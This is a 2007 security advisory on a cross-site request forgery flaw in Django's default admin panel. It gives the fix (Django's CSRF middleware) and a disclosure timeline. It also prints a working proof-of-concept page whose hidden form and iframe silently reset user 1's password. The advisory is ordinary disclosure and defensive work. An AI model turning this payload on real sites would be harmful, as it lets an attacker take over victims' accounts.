Author: J. Carlos Nieto.
Date: Oct 21, 2007
There exists a security hole in the default django's admin panel.
Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin
privileges to modify the database tables, it allows to change any user
password too.
See more at http://www.djangoproject.com
django has, by default, no CSRF protection, this may allow an attacker
to change any user password by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change the password of the user with id = n. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.
Mild. This problem exists only with the default installation and can be
easily solved using a middleware found in here:
http://www.djangoproject.com/documentation/csrf/.
<script type="text/javascript">
window.onload = function() {
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";
var pass = "funky";
var param = {
password1: pass,
password2: pass
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
Use the django's CSRF protection in all your applications. Take a look
at http://www.djangoproject.com/documentation/csrf/.
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release
Copyright 2007 J. Carlos Nieto
The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.